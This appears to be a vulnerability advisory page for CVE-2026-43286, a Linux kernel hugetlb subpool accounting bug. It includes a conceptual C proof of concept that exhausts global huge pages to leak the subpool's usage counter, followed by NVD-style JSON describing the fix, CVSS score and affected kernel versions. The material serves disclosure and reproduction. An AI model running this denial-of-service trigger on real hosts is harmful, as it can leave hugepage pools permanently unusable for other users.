CVE-2026-43286

/* * PoC for CVE-2026-43286 * Conceptual reproduction to trigger subpool leak. * Requires root privileges to mount hugetlbfs and allocate pages. */ #include <stdio.h> #include <stdlib.h> #include <sys/mman.h> #include <fcntl.h> #include <unistd.h> #define HUGETLB_SIZE (2 * 1024 * 1024) // 2MB huge page void consume_global_pages(int count) { // Allocate pages globally to exhaust the pool for (int i = 0; i < count; i++) { void *addr = mmap(NULL, HUGETLB_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_HUGETLB, -1, 0); if (addr == MAP_FAILED) { perror("mmap global failed"); return; } // Keep the mapping to hold the page } printf("Consumed %d global pages.\n", count); } int main() { // Step 1: Setup environment (conceptual, usually done via shell) // mount -t hugetlbfs none /mnt/huge -o min_size=2M,max_size=4M // Step 2: Consume global pages to create a scenario where global allocation fails // Assuming we have limited global pool, e.g., 4 pages total, subpool min=2, max=4 // We consume 2 pages globally, leaving 2 for the system/subpool interactions. consume_global_pages(2); // Step 3: Trigger the vulnerable path // Open a file on the hugetlbfs mount (subpool) int fd = open("/mnt/huge/test_file", O_CREAT | O_RDWR, 0755); if (fd < 0) { perror("open"); return 1; } // Step 4: Request 3 pages from the subpool. // Subpool min=2, max=4. Used=0. // Request asks for 3. Subpool provides 2, asks Global for 1. // If Global is exhausted (consumed in step 2), global allocation fails. // Vulnerability: spool->used_hpages increases by 3, but only decreases by 2 on failure. // Leak of 1 page in used_hpages counter. void *addr = mmap(NULL, 3 * HUGETLB_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0); if (addr == MAP_FAILED) { printf("Allocation failed as expected (Global pool exhausted).\n"); printf("Subpool used_hpages counter is now leaked (corrupted).\n"); } else { printf("Allocation succeeded, vulnerability might not be triggered or pool is larger.\n"); munmap(addr, 3 * HUGETLB_SIZE); } close(fd); return 0; }

{"cve": {"id": "CVE-2026-43286", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-08T14:16:35.473", "lastModified": "2026-05-15T17:03:28.150", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm/hugetlb: restore failed global reservations to subpool\n\nCommit a833a693a490 (\"mm: hugetlb: fix incorrect fallback for subpool\")\nfixed an underflow error for hstate->resv_huge_pages caused by incorrectly\nattributing globally requested pages to the subpool's reservation.\n\nUnfortunately, this fix also introduced the opposite problem, which would\nleave spool->used_hpages elevated if the globally requested pages could\nnot be acquired. This is because while a subpool's reserve pages only\naccounts for what is requested and allocated from the subpool, its \"used\"\ncounter keeps track of what is consumed in total, both from the subpool\nand globally. Thus, we need to adjust spool->used_hpages in the other\ndirection, and make sure that globally requested pages are uncharged from\nthe subpool's used counter.\n\nEach failed allocation attempt increments the used_hpages counter by how\nmany pages were requested from the global pool. Ultimately, this renders\nthe subpool unusable, as used_hpages approaches the max limit.\n\nThe issue can be reproduced as follows:\n1. Allocate 4 hugetlb pages\n2. Create a hugetlb mount with max=4, min=2\n3. Consume 2 pages globally\n4. Request 3 pages from the subpool (2 from subpool + 1 from global)\n\t4.1 hugepage_subpool_get_pages(spool, 3) succeeds.\n\t\tused_hpages += 3\n\t4.2 hugetlb_acct_memory(h, 1) fails: no global pages left\n\t\tused_hpages -= 2\n5. Subpool now has used_hpages = 1, despite not being able to\n successfully allocate any hugepages. It believes it can now only\n allocate 3 more hugepages, not 4.\n\nWith each failed allocation attempt incrementing the used counter, the\nsubpool eventually reaches a point where its used counter equals its\nmax counter. At that point, any future allocations that try to\nallocate hugeTLB pages from the subpool will fail, despite the subpool\nnot having any of its hugeTLB pages consumed by any user.\n\nOnce this happens, there is no way to make the subpool usable again,\nsince there is no way to decrement the used counter as no process is\nreally consuming the hugeTLB pages.\n\nThe underflow issue that the original commit fixes still remains fixed\nas well.\n\nWithout this fix, used_hpages would keep on leaking if\nhugetlb_acct_memory() fails."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.14.8", "versionEndExcluding": "6.15", "matchCriteriaId": "F41DF25A-BF6E-49BA-950C-6BD0DA29BE5A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.15.1", "versionEndExcluding": "6.18.16", "matchCriteriaId": "7D6C7D7E-FAB1-4943-A180-74E41C8AA41A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.6", "matchCriteriaId": "373EEEDA-FAA1-4FB4-B6ED-DB4DD99DBE67"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.15:-:*:*:*:*:*:*", "matchCriteriaId": "A1ECC65A-EE37-4479-8E99-4BB68A22A31F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc5:*:*:*:*:*:*", "matchCriteriaId": "58A9FEFF-C040-420D-8F0A-BFDAAA1DF258"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc6:*:*:*:*:*:*", "matchCriteriaId": "1D2315C0-D46F-4F85-9754-F9E5E11374A6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:r ... (truncated)